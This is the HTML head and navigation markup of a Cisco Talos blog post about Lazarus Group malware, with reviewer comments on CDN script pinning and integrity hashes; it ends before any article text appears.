<!doctype html>
<html lang="en">

<head>
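    <!-- Charset declaration first: it must precede any text content (the title) so the parser never decodes it with a guessed encoding -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>Lazarus Group&#x27;s infrastructure reuse leads to discovery of new malware</title>

    <!-- Theme CSS: same-origin, cache-busted by the ?v= query -->
    <link rel="stylesheet" href="https://blog.talosintelligence.com/assets/css/bootstrap.min.css?v=007426292d">
    <link rel="stylesheet" href="https://blog.talosintelligence.com/assets/css/navigation.css?v=007426292d">
    <link rel="stylesheet" href="https://blog.talosintelligence.com/assets/css/pagination.css?v=007426292d">
    <link rel="stylesheet" href="https://blog.talosintelligence.com/assets/css/banners.css?v=007426292d">
    <link rel="stylesheet" href="https://blog.talosintelligence.com/assets/css/style.css?v=007426292d">

    <!-- Google Fonts: preconnect to both origins; font files are CORS-fetched from gstatic, hence crossorigin there -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <!-- One combined request. The separate Roboto-only request that used to precede this one asked for exactly
         the same ital/wght set and was a duplicate fetch, so it is gone. -->
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Fira+Mono:wght@400;500&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;1,100;1,300;1,400&display=swap">
    <!-- NOTE(review): third-party stylesheet pulled from a public CDN on the floating "@latest" tag with no
         integrity attribute, so whatever that package publishes next is applied to this page unverified.
         Pin an exact release and add integrity="<sha384 of the pinned file>" crossorigin="anonymous" once chosen. -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/ghost-theme-utils@latest/dist/css/style.min.css">


    <meta name="description" content="Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.">
    <link rel="icon" href="https://blog.talosintelligence.com/content/images/size/w256h256/2022/07/talos_o_square.png" type="image/png">
    <link rel="canonical" href="https://blog.talosintelligence.com/lazarus-collectionrat/">
    <!-- Full referrer is sent to HTTPS destinations only; downgraded (HTTP) navigations get none -->
    <meta name="referrer" content="no-referrer-when-downgrade">
    
    <!-- Open Graph / article metadata (entity-escaped apostrophe is correct inside an attribute value) -->
    <meta property="og:site_name" content="Cisco Talos Blog">
    <meta property="og:type" content="article">
    <meta property="og:title" content="Lazarus Group&#x27;s infrastructure reuse leads to discovery of new malware">
    <meta property="og:description" content="Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.">
    <meta property="og:url" content="https://blog.talosintelligence.com/lazarus-collectionrat/">
    <meta property="og:image" content="https://blog.talosintelligence.com/content/images/2023/08/lazarus-group-1.jpg">
    <meta property="article:published_time" content="2023-08-24T12:04:22.000Z">
    <meta property="article:modified_time" content="2023-08-25T14:18:03.000Z">
    <meta property="article:tag" content="Threats">
    <meta property="article:tag" content="SecureX">
    <meta property="article:tag" content="Landing Page Top Story">
    <meta property="article:tag" content="Top Story">
    
    <!-- Twitter card metadata -->
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="Lazarus Group&#x27;s infrastructure reuse leads to discovery of new malware">
    <meta name="twitter:description" content="Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.">
    <meta name="twitter:url" content="https://blog.talosintelligence.com/lazarus-collectionrat/">
    <meta name="twitter:image" content="https://blog.talosintelligence.com/content/images/2023/08/lazarus-group-1.jpg">
    <meta name="twitter:label1" content="Written by">
    <meta name="twitter:data1" content="Asheer Malhotra">
    <meta name="twitter:label2" content="Filed under">
    <meta name="twitter:data2" content="Threats, SecureX, Landing Page Top Story, Top Story">
    <meta name="twitter:site" content="@TalosSecurity">
    <meta name="twitter:creator" content="@asheermalhotra">
    <meta property="og:image:width" content="2000">
    <meta property="og:image:height" content="1000">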
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
        "@type": "Organization",
        "name": "Cisco Talos Blog",
        "url": "https://blog.talosintelligence.com/",
        "logo": {
            "@type": "ImageObject",
            "url": "https://blog.talosintelligence.com/content/images/2022/11/TalosBrand_ukraine.svg"
        }
    },
    "author": {
        "@type": "Person",
        "name": "Asheer Malhotra",
        "url": "https://blog.talosintelligence.com/author/asheer-malhotra/",
        "sameAs": [
            "https://twitter.com/asheermalhotra"
        ]
    },
    "headline": "Lazarus Group's infrastructure reuse leads to discovery of new malware",
    "url": "https://blog.talosintelligence.com/lazarus-collectionrat/",
    "datePublished": "2023-08-24T12:04:22.000Z",
    "dateModified": "2023-08-25T14:18:03.000Z",
    "image": {
        "@type": "ImageObject",
        "url": "https://blog.talosintelligence.com/content/images/2023/08/lazarus-group-1.jpg",
        "width": 2000,
        "height": 1000
    },
    "keywords": "Threats, SecureX, Landing Page Top Story, Top Story",
    "description": "Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase. ",
    "mainEntityOfPage": "https://blog.talosintelligence.com/lazarus-collectionrat/"
}
    </script>

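    <!-- The generator meta that advertised the exact CMS version (Ghost 5.59) was dropped: no client needs it,
         and it only made fingerprinting the platform version trivial. -->
    <link rel="alternate" type="application/rss+xml" title="Cisco Talos Blog" href="https://blog.talosintelligence.com/rss/">
    
    <!-- Ghost site search. data-key is presumably the Ghost Content API key, which is read-only and public by
         design — confirm it is not an Admin API key. NOTE(review): this script comes from a public CDN on a
         floating semver range (@~1.1) with no integrity attribute, so a compromised or malicious publish of that
         package would execute as first-party code on this origin; pin an exact release and add
         integrity="<sha384 of the pinned file>" (crossorigin="anonymous" is already present). -->
    <script defer src="https://cdn.jsdelivr.net/ghost/sodo-search@~1.1/umd/sodo-search.min.js" data-key="4ffb0139d74ada998f4b141e4d" data-styles="https://cdn.jsdelivr.net/ghost/sodo-search@~1.1/umd/main.css" data-sodo-search="https://cisco-talos-blog.ghost.io/" crossorigin="anonymous"></script>
    
    <link rel="webmention" href="https://blog.talosintelligence.com/webmentions/receive/">
    <!-- Ghost card assets, same-origin and cache-busted. The redundant type="text/css" was dropped: it is the
         default for rel="stylesheet". -->
    <script defer src="/public/cards.min.js?v=007426292d"></script>
    <link rel="stylesheet" href="/public/cards.min.css?v=007426292d">
    <style>
    img[src*="icon_check_white.svg"] { width: 20px; margin-left: 0px; margin-right: auto; }
    
    /* presumably the Ghost members portal is unused on this site and is hidden here — TODO confirm */
    #ghost-portal-root { display: none; }
    </style>
    <!-- Google tag (gtag.js). NOTE(review): the inline bootstrap below (and the inline style blocks above) means
         a strict script-src/style-src CSP cannot be deployed without a server-issued nonce; the vendor snippet is
         kept verbatim here, but it should move into the deferred theme bundle if CSP is tightened. -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-F45RVJG3BK"></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
    
      gtag('config', 'G-F45RVJG3BK');
    </script>
    <style>:root {--ghost-accent-color: #006db6;}</style>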
</head>

<body class="post-template tag-threats tag-securex-3 tag-landing-page-top-story tag-top-story">

    <div id="mobile-page-header" class="desktop-hide">
    <h1>Cisco Talos Intelligence Blog</h1>
</div>
<input id="nav-trigger" class="nav-trigger" type="checkbox"/>
<label for="nav-trigger">
    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="22px" height="16px" viewBox="0 0 22 16">
        <g id="menu-icon">
            <path fill="#FFFFFF" d="M20.5,3h-19C0.672,3,0,2.329,0,1.5S0.672,0,1.5,0h19C21.328,0,22,0.671,22,1.5S21.328,3,20.5,3z"></path>
            <path fill="#FFFFFF" d="M20.5,9.5h-19C0.672,9.5,0,8.828,0,8c0-0.829,0.672-1.5,1.5-1.5h19C21.328,6.5,22,7.171,22,8   C22,8.828,21.328,9.5,20.5,9.5z"></path>
            <path fill="#FFFFFF" d="M20.5,16h-19C0.672,16,0,15.328,0,14.5S0.672,13,1.5,13h19c0.828,0,1.5,0.672,1.5,1.5S21.328,16,20.5,16z"></path>
        </g>
    </svg>
</label>
<nav id="nav">
    <div id="top-nav-bar">
    </div>

    <div id="navigation">
        <div class="navigation-logos-wrapper">
            <div id="cisco-logo-wrapper">
                <img src="https://blog.talosintelligence.com/assets/images/logo_cisco_white.svg?v=007426292d" alt="Cisco Systems, Inc.">
            </div>
            <div id="talos-logo-wrapper">
                <a class="navbar-brand" href="https://talosintelligence.com">
                    <img src="https://blog.talosintelligence.com/content/images/2022/11/TalosBrand_ukraine.svg" alt="Cisco Talos Blog" class="site-logo">
                </a>
            </div>
        </div>
        <div class="navigation-links-wrapper">
            <ul class="main-nav-list">
                <li class="nav-item">
                    <a class="primary_nav_link" href="https://talosintelligence.com/software">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" viewBox="0 0 20 20" style="enable-background:new 0 0 20 20;" xml:space="preserve">
                            <style type="text/css">
                                .white{fill:#FFFFFF;}
                            </style>
                            <path class="white" d="M19.4,17.1c0,0.1-0.1,0-0.2,0c0,0-1.3-0.9-2-1.4c-0.2-0.1-0.5-0.1-0.6,0.1c-0.3,0.3-0.6,0.8-0.9,1.3  c-0.1,0.2-0.1,0.5,0.1,0.6l2,1.5c0.1,0,0,0.1,0.1,0.2c0,0.1,0,0.1-0.1,0.2c-1.2,0.5-2.6,0.2-3.5-0.7c-0.8-0.9-1-2-0.7-3.1L4.5,6.5  c-1,0.3-2.3,0-3-0.9c-0.8-0.9-1.1-1.7-1-2.7c0-0.1,0-0.1,0.1-0.2c0.1,0,0.2,0.1,0.2,0.1l2,1.5C3,4.4,3.3,4.5,3.4,4.2  c0,0,0.5-0.8,0.9-1.3c0.1-0.2,0.1-0.5-0.1-0.6L2.3,0.9c-0.1,0,0-0.1-0.1-0.3c0-0.1,0-0.1,0.1-0.2C3.5-0.1,5,0.2,5.8,1.1  c0.8,0.9,1,2,0.7,3.1l9.1,9.3c1-0.3,2.3,0,3,0.9c0.7,0.7,0.9,1.5,0.9,2.5C19.5,16.9,19.5,17,19.4,17.1z"></path>
                        </svg>
                        <span>Software</span>
                    </a>
                </li>
                <li class="nav-item">
                    <div class="primary-link-wrapper">
                        <a class="primary_nav_link" href="https://talosintelligence.com/vulnerability_info">
                            <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="26px" height="20px" viewBox="0 0 26 20">
                                <g id="vuln-icon" class="nav-icon">
                                    <path fill="#FFFFFF" d="M24.256,18.49L13.872,0.503C13.692,0.192,13.36,0,13,0c-0.359,0-0.692,0.192-0.872,0.503L1.744,18.49  c-0.18,0.312-0.18,0.695,0,1.006C1.924,19.809,2.257,20,2.616,20h20.769c0.359,0,0.691-0.191,0.871-0.504  C24.436,19.186,24.436,18.803,24.256,18.49 M14.268,18.215h-2.533v-1.85h2.533V18.215z M14.268,15.441h-2.533L10.89,6.515h4.222  L14.268,15.441z"></path>
                                </g>
                            </svg>
                            <span>Vulnerability Information</span>
                        </a>
                    </div>
                    <input class="sub-nav-trigger" id="vuln-sub-trigger" type="checkbox">
                    <label class="sub-nav-trigger-label" for="vuln-sub-trigger">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="48.167px" height="47.75px" viewBox="0 0 48.167 47.75">
                            <circle opacity="0.4" fill="none" stroke="#FFFFFF" stroke-miterlimit="10" cx="24.083" cy="23.875" r="22"></circle>
                            <g>
                                <circle fill="#FFFFFF" cx="24.083" cy="16.068" r="2.496"></circle>
                                <circle fill="#FFFFFF" cx="24.083" cy="23.875" r="2.496"></circle>
                                <circle fill="#FFFFFF" cx="24.083" cy="31.682" r="2.496"></circle>
                            </g>
                        </svg>
                    </label>
                    <ul class="sub-nav">
                        <li class="desktop-hide">
                            <a href="https://talosintelligence.com/vulnerability_info">
                                <h4>Vulnerability Information</h4>
                            </a>
                        </li>
                        <li class="desktop-hide">
                            <label class="subnav-back-button" for="vuln-sub-trigger">BACK</label>
                        </li>
                        <li><a href="https://talosintelligence.com/vulnerability_reports">Vulnerability Reports</a></li>
                        <li><a href="https://talosintelligence.com/ms_advisories">Microsoft Advisories</a></li>
                    </ul>
                    <div class="desktop-hide subnav-overlay">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="26px" height="20px" viewBox="0 0 26 20">
                            <g id="vuln-icon" class="nav-icon">
                                <path fill="#FFFFFF" d="M24.256,18.49L13.872,0.503C13.692,0.192,13.36,0,13,0c-0.359,0-0.692,0.192-0.872,0.503L1.744,18.49  c-0.18,0.312-0.18,0.695,0,1.006C1.924,19.809,2.257,20,2.616,20h20.769c0.359,0,0.691-0.191,0.871-0.504  C24.436,19.186,24.436,18.803,24.256,18.49 M14.268,18.215h-2.533v-1.85h2.533V18.215z M14.268,15.441h-2.533L10.89,6.515h4.222  L14.268,15.441z"></path>
                            </g>
                        </svg>
                    </div>
                </li>
                <li class="nav-item">
                    <div class="primary-link-wrapper">
                        <a class="primary_nav_link" href="https://talosintelligence.com/reputation">
                            <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" viewBox="0 0 20 20" height="20px" width="20px" style="enable-background:new 0 0 20 20;" xml:space="preserve">
                                <style type="text/css">
                                    .white{fill:#FFFFFF;}
                                </style>
                                <g>
                                <path class="white" d="M19.5,9.5h-1.1c-0.3-4.2-3.6-7.6-7.8-7.8V0.5C10.5,0.2,10.3,0,10,0l0,0C9.7,0,9.5,0.2,9.5,0.5l0,0v1.1   C5.3,1.9,1.9,5.3,1.6,9.5H0.5C0.2,9.5,0,9.7,0,10s0.2,0.5,0.5,0.5l0,0h1.1c0.3,4.2,3.6,7.6,7.8,7.8v1.1c0,0.3,0.2,0.5,0.5,0.5l0,0   c0.3,0,0.5-0.2,0.5-0.5l0,0v-1.1c4.2-0.3,7.6-3.6,7.8-7.8h1.1c0.3,0,0.5-0.2,0.5-0.5C20,9.7,19.8,9.5,19.5,9.5 M16.6,10.5h0.7   c-0.3,3.6-3.2,6.5-6.8,6.8v-0.8c0-0.3-0.2-0.5-0.5-0.5l0,0c-0.3,0-0.5,0.2-0.5,0.5v0.8C5.8,17,3,14.2,2.7,10.5h0.8   C3.8,10.5,4,10.3,4,10S3.8,9.5,3.5,9.5l0,0H2.7C3,5.8,5.8,3,9.5,2.7v0.8C9.5,3.7,9.7,4,10,4l0,0c0.3,0,0.5-0.2,0.5-0.5V2.7   C14.2,3,17,5.8,17.3,9.5h-0.7c-0.3,0-0.5,0.2-0.5,0.5C16.1,10.3,16.3,10.5,16.6,10.5L16.6,10.5"></path>
                                    <circle class="white" cx="10" cy="10" r="3.2"></circle>
                                </g>
                            </svg>
                            <span>
                                Reputation Center
                            </span>
                        </a>
                    </div>
                    <input class="sub-nav-trigger" id="reputation-sub-trigger" type="checkbox">
                    <label class="sub-nav-trigger-label" for="reputation-sub-trigger">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="48.167px" height="47.75px" viewBox="0 0 48.167 47.75">
                            <circle opacity="0.4" fill="none" stroke="#FFFFFF" stroke-miterlimit="10" cx="24.083" cy="23.875" r="22"></circle>
                            <g>
                                <circle fill="#FFFFFF" cx="24.083" cy="16.068" r="2.496"></circle>
                                <circle fill="#FFFFFF" cx="24.083" cy="23.875" r="2.496"></circle>
                                <circle fill="#FFFFFF" cx="24.083" cy="31.682" r="2.496"></circle>
                            </g>
                        </svg>
                    </label>
                    <ul class="sub-nav">
                        <li class="desktop-hide">
                            <a href="https://talosintelligence.com/reputation">
                                <h4>Reputation Center</h4>
                            </a>
                        </li>
                        <li class="desktop-hide">
                            <label class="subnav-back-button" for="reputation-sub-trigger">BACK</label>
                        </li>
                        <li><a data-method="get" href="https://talosintelligence.com/reputation_center">IP &amp; Domain Reputation</a></li>
                        <li><a href="https://talosintelligence.com/talos_file_reputation">Talos File Reputation</a></li>
                        <li><a href="https://talosintelligence.com/amp-naming">Secure Endpoint Naming Conventions</a></li>
                        <li><a href="https://talosintelligence.com/categories">Intelligence Categories</a></li>
                    </ul>
                    <div class="desktop-hide subnav-overlay">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" viewBox="0 0 20 20" height="20px" width="20px" style="enable-background:new 0 0 20 20;" xml:space="preserve">
                            <style type="text/css">
                                .white{fill:#FFFFFF;}
                            </style>
                            <g>
                            <path class="white" d="M19.5,9.5h-1.1c-0.3-4.2-3.6-7.6-7.8-7.8V0.5C10.5,0.2,10.3,0,10,0l0,0C9.7,0,9.5,0.2,9.5,0.5l0,0v1.1   C5.3,1.9,1.9,5.3,1.6,9.5H0.5C0.2,9.5,0,9.7,0,10s0.2,0.5,0.5,0.5l0,0h1.1c0.3,4.2,3.6,7.6,7.8,7.8v1.1c0,0.3,0.2,0.5,0.5,0.5l0,0   c0.3,0,0.5-0.2,0.5-0.5l0,0v-1.1c4.2-0.3,7.6-3.6,7.8-7.8h1.1c0.3,0,0.5-0.2,0.5-0.5C20,9.7,19.8,9.5,19.5,9.5 M16.6,10.5h0.7   c-0.3,3.6-3.2,6.5-6.8,6.8v-0.8c0-0.3-0.2-0.5-0.5-0.5l0,0c-0.3,0-0.5,0.2-0.5,0.5v0.8C5.8,17,3,14.2,2.7,10.5h0.8   C3.8,10.5,4,10.3,4,10S3.8,9.5,3.5,9.5l0,0H2.7C3,5.8,5.8,3,9.5,2.7v0.8C9.5,3.7,9.7,4,10,4l0,0c0.3,0,0.5-0.2,0.5-0.5V2.7   C14.2,3,17,5.8,17.3,9.5h-0.7c-0.3,0-0.5,0.2-0.5,0.5C16.1,10.3,16.3,10.5,16.6,10.5L16.6,10.5"></path>
                                <circle class="white" cx="10" cy="10" r="3.2"></circle>
                            </g>
                        </svg>
                    </div>
                </li>
                <li class="nav-item">
                    <a class="primary_nav_link" href="https://talosintelligence.com/resources">
                        <svg xmlns="http://www.w3.org/2000/svg" width="124.999" height="153.391" viewBox="0 0 124.999 153.391">
                            <g>
                                <polygon points="89.149 8.214 89.149 37.263 118.199 37.263 89.149 8.214" fill="#fff"></polygon>
                                <path d="M80.2,44.8V0H21.122A3.72,3.72,0,0,0,17.4,3.719V135.361H121.28A3.719,3.719,0,0,0,125,131.643V44.8ZM36.6,30.7H68.138v7.809H36.6Zm0,24.188h64.427V62.7H36.6Zm0,24.185H79.557v7.809H36.6Zm64.752,32H36.6v-7.81h64.752Z" fill="#fff"></path>
                                <path d="M9.606,18.03H3.718A3.719,3.719,0,0,0,0,21.749V149.672a3.719,3.719,0,0,0,3.718,3.719H103.877a3.72,3.72,0,0,0,3.719-3.719v-6.354H9.942Z" fill="#fff"></path>
                            </g>
                        </svg>
                        <span>Library</span>
                    </a>
                </li>
                <li class="nav-item">
                    <a class="primary_nav_link" href="https://support.talosintelligence.com/">
                        <svg xmlns="http://www.w3.org/2000/svg" width="26px" height="20px" viewBox="0 0 123.17 159.292">
                            <path d="M61.59,0,0,17.069v85.32c0,23.472,61.59,56.9,61.59,56.9s61.58-36.288,61.58-56.9V17.069Zm-.433,149.746C38.314,136.662,8.128,114.3,8.128,102.389V23.239l53.029-14.7Z" fill="#fff"></path>
                        </svg>
                        <span>Support</span>
                    </a>
                </li>
                <li class="nav-item">
                    <a class="primary_nav_link" href="https://talosintelligence.com/incident_response">
                        <svg xmlns="http://www.w3.org/2000/svg" width="111.588" height="148.311" viewBox="0 0 111.588 148.311">
                            <path d="M1.181,128.446v15.7a4.167,4.167,0,0,0,4.167,4.167h100.9a4.167,4.167,0,0,0,4.167-4.167v-15.7a4.167,4.167,0,0,0-4.167-4.167H5.348a4.167,4.167,0,0,0-4.167,4.166M55.8,63.109a3.277,3.277,0,1,1,0,6.553c-10.344,0-20.755,8.578-20.755,18.57a3.277,3.277,0,1,1-6.554,0C28.489,73.947,41.93,63.109,55.8,63.109Zm0-12.016c-21.787,0-39.325,17.81-39.325,39.937v26.7H95.122V91.03c0-22.128-17.537-39.937-39.324-39.937m52.365-38.3a3.291,3.291,0,0,0-2.254,1.024L88.432,31.294a3.283,3.283,0,0,0,4.642,4.644l17.478-17.479a3.278,3.278,0,0,0-2.389-5.666m-105.138,0a3.276,3.276,0,0,0-1.98,5.666L18.522,35.938a3.283,3.283,0,0,0,4.643-4.644L5.687,13.817A3.255,3.255,0,0,0,3.025,12.793ZM55.389.026a3.276,3.276,0,0,0-2.867,3.345V19.642a3.277,3.277,0,1,0,6.554,0V3.371A3.283,3.283,0,0,0,55.389.026Z" fill="#fff"></path>
                        </svg>
                        <span>Incident Response</span>
                    </a>
                </li>

                <li class="nav-item">
                    <a class="primary_nav_link" href="https://talosintelligence.com/careers">
                        <svg xmlns="http://www.w3.org/2000/svg" width="153.816" height="90" viewBox="0 0 153.816 90">
                            <g>
                                <path d="M56.336,47.451a31.328,31.328,0,0,0-17.1-10.872A19.564,19.564,0,0,0,50.91,19.1C50.91,8.868,42.008,0,31.735,0S12.559,8.868,12.559,19.1A19.564,19.564,0,0,0,24.22,36.574,31.239,31.239,0,0,0,0,66.717c0,2.343,12.671,10.9,31.883,10.9a63.142,63.142,0,0,0,6.536-.341,37,37,0,0,1,8.222-21.367,38.039,38.039,0,0,1,9.7-8.456" fill="#fff" fill-rule="evenodd"></path>
                                <path d="M106.731,70.729a32.386,32.386,0,0,0-1.889-4.815c-.014-.029-.028-.058-.043-.087a32.308,32.308,0,0,0-2.568-4.335c-.033-.047-.066-.095-.1-.142-.312-.436-.631-.866-.964-1.287l-.015-.02a32.215,32.215,0,0,0-2.185-2.483l-.166-.168c-.369-.372-.745-.737-1.131-1.09l-.025-.024c-.415-.379-.838-.744-1.272-1.1l-.081-.064q-.582-.474-1.189-.92l-.217-.159c-.43-.312-.866-.616-1.313-.9h0a31.084,31.084,0,0,0-9.679-4.164A19.564,19.564,0,0,0,95.566,31.488c0-10.234-8.9-19.1-19.175-19.1s-19.176,8.868-19.176,19.1A19.564,19.564,0,0,0,68.876,48.96a31.828,31.828,0,0,0-9.109,3.733h0a31.8,31.8,0,0,0-6.941,5.668l-.045.05a31.3,31.3,0,0,0-2.243,2.738l-.024.034q-.5.693-.969,1.415c-.014.023-.03.047-.046.07a31.053,31.053,0,0,0-1.7,3.019c-.028.059-.057.117-.085.175a30.16,30.16,0,0,0-1.33,3.185c-.02.056-.038.112-.058.169q-.255.741-.474,1.5c-.019.065-.039.13-.057.2a30.092,30.092,0,0,0-.741,3.374c-.015.094-.03.188-.044.282-.084.56-.158,1.123-.211,1.693v.007c-.087.935-.135,1.88-.135,2.834,0,2.343,12.671,10.9,31.883,10.9s31.583-8.555,31.583-10.9a32.8,32.8,0,0,0-1.384-8.35l-.007-.023" fill="#fff" fill-rule="evenodd"></path>
                                <path d="M129.588,36.579A19.564,19.564,0,0,0,141.261,19.1c0-10.234-8.9-19.1-19.175-19.1S102.91,8.868,102.91,19.1a19.562,19.562,0,0,0,11.66,17.472A31.817,31.817,0,0,0,96.916,47.859a38.586,38.586,0,0,1,17.373,29.253,63.062,63.062,0,0,0,7.945.5c19.212,0,31.582-8.554,31.582-10.9a31.947,31.947,0,0,0-24.228-30.138" fill="#fff" fill-rule="evenodd"></path>
                            </g>
                        </svg>
                        <span>Careers</span>
                    </a>
                </li>

                <li class="nav-item">
                    <div class="primary-link-wrapper">
                        <a id="link_blog" class="primary_nav_link" href="https://blog.talosintelligence.com">
                            <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" width="260px" height="296.5px" viewBox="0 0 260 296.5" enable-background="new 0 0 260 296.5" xml:space="preserve">
                                <path fill="#FFFFFF" d="M243.586,42.404h-14.448c-0.943-4.513-3.143-8.813-6.616-12.33L201.793,9.098  c-4.7-4.757-10.972-7.377-17.66-7.377c-6.578,0-12.777,2.547-17.457,7.173l-33.875,33.511H17.586c-6.6,0-12,5.399-12,12V226.28  c0,6.6,5.4,12,12,12H153.83l84.21,56.278l-27.448-56.278h32.994c6.6,0,12-5.4,12-12V54.404  C255.586,47.804,250.186,42.404,243.586,42.404z M214.662,48.045c-0.01,0.2-0.021,0.399-0.044,0.599  c-0.008,0.069-0.021,0.139-0.031,0.207c-0.046,0.345-0.113,0.688-0.196,1.026c-0.034,0.137-0.063,0.273-0.103,0.408  c-0.039,0.135-0.087,0.267-0.133,0.399c-0.051,0.151-0.102,0.302-0.16,0.45c-0.049,0.126-0.105,0.249-0.16,0.373  c-0.068,0.153-0.139,0.307-0.216,0.457c-0.059,0.116-0.12,0.23-0.184,0.345c-0.088,0.157-0.181,0.312-0.278,0.465  c-0.065,0.104-0.13,0.206-0.2,0.308c-0.115,0.168-0.239,0.33-0.366,0.492c-0.064,0.081-0.124,0.165-0.19,0.244  c-0.199,0.238-0.409,0.472-0.635,0.694L82.458,182.308l-47.932,12.871l13.427-47.74L177.223,19.561  c1.917-1.895,4.414-2.84,6.911-2.84c2.534,0,5.068,0.975,6.99,2.92l20.726,20.974c0.545,0.552,1.002,1.156,1.39,1.79  c0.574,0.938,0.975,1.951,1.206,2.993c0.004,0.021,0.01,0.04,0.014,0.06c0.049,0.226,0.086,0.453,0.119,0.682  c0.008,0.06,0.017,0.118,0.024,0.178c0.026,0.211,0.045,0.424,0.058,0.636c0.004,0.077,0.007,0.153,0.009,0.23  c0.007,0.203,0.011,0.407,0.005,0.61C214.673,47.877,214.666,47.961,214.662,48.045z"></path>
                            </svg>
                            <span>Blog</span>
                        </a>
                    </div>
                    <input id="blog-sub-trigger" class="sub-nav-trigger" type="checkbox"/>
                    <label class="sub-nav-trigger-label" for="blog-sub-trigger">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="48.167px" height="47.75px" viewBox="0 0 48.167 47.75">
                            <circle opacity="0.4" fill="none" stroke="#FFFFFF" stroke-miterlimit="10" cx="24.083" cy="23.875" r="22"></circle>
                            <g>
                                <circle fill="#FFFFFF" cx="24.083" cy="16.068" r="2.496"></circle>
                                <circle fill="#FFFFFF" cx="24.083" cy="23.875" r="2.496"></circle>
                                <circle fill="#FFFFFF" cx="24.083" cy="31.682" r="2.496"></circle>
                            </g>
                        </svg>
                    </label>
                    <ul class="sub-nav">
                        <li class="desktop-hide">
                            <a href="https://blog.talosintelligence.com">
                                <h4>Blog</h4>
                            </a>
                        </li>
                        <li class="desktop-hide">
                            <label class="subnav-back-button" for="blog-sub-trigger">BACK</label>
                        </li>
                        <li>
                            <a href="https://blog.talosintelligence.com">Talos Blog</a>
                        </li>
                        <li>
                            <a href="https://blog.talosintelligence.com/category/threat-source-newsletter/">Talos Threat Source Newsletter</a>
                        </li>
                    </ul>
                    <div class="desktop-hide subnav-overlay">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" width="20px" height="20px" viewBox="0 0 260 296.5" enable-background="new 0 0 260 296.5" xml:space="preserve">
                            <path fill="#FFFFFF" d="M243.586,42.404h-14.448c-0.943-4.513-3.143-8.813-6.616-12.33L201.793,9.098  c-4.7-4.757-10.972-7.377-17.66-7.377c-6.578,0-12.777,2.547-17.457,7.173l-33.875,33.511H17.586c-6.6,0-12,5.399-12,12V226.28  c0,6.6,5.4,12,12,12H153.83l84.21,56.278l-27.448-56.278h32.994c6.6,0,12-5.4,12-12V54.404  C255.586,47.804,250.186,42.404,243.586,42.404z M214.662,48.045c-0.01,0.2-0.021,0.399-0.044,0.599  c-0.008,0.069-0.021,0.139-0.031,0.207c-0.046,0.345-0.113,0.688-0.196,1.026c-0.034,0.137-0.063,0.273-0.103,0.408  c-0.039,0.135-0.087,0.267-0.133,0.399c-0.051,0.151-0.102,0.302-0.16,0.45c-0.049,0.126-0.105,0.249-0.16,0.373  c-0.068,0.153-0.139,0.307-0.216,0.457c-0.059,0.116-0.12,0.23-0.184,0.345c-0.088,0.157-0.181,0.312-0.278,0.465  c-0.065,0.104-0.13,0.206-0.2,0.308c-0.115,0.168-0.239,0.33-0.366,0.492c-0.064,0.081-0.124,0.165-0.19,0.244  c-0.199,0.238-0.409,0.472-0.635,0.694L82.458,182.308l-47.932,12.871l13.427-47.74L177.223,19.561  c1.917-1.895,4.414-2.84,6.911-2.84c2.534,0,5.068,0.975,6.99,2.92l20.726,20.974c0.545,0.552,1.002,1.156,1.39,1.79  c0.574,0.938,0.975,1.951,1.206,2.993c0.004,0.021,0.01,0.04,0.014,0.06c0.049,0.226,0.086,0.453,0.119,0.682  c0.008,0.06,0.017,0.118,0.024,0.178c0.026,0.211,0.045,0.424,0.058,0.636c0.004,0.077,0.007,0.153,0.009,0.23  c0.007,0.203,0.011,0.407,0.005,0.61C214.673,47.877,214.666,47.961,214.662,48.045z"></path>
                        </svg>

                    </div>
                </li>

                <li class="nav-item">
                    <div class="primary-link-wrapper">
                        <a class="primary_nav_link" href="https://talosintelligence.com/podcasts">
                            <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="podcast-icon-nav" x="0px" y="0px" viewBox="0 0 71.8 75" width="26px" height="20px" style="enable-background:new 0 0 71.8 75;" xml:space="preserve">
                                <style type="text/css">
                                    .podcast-fill{fill:#fff;}
                                </style>
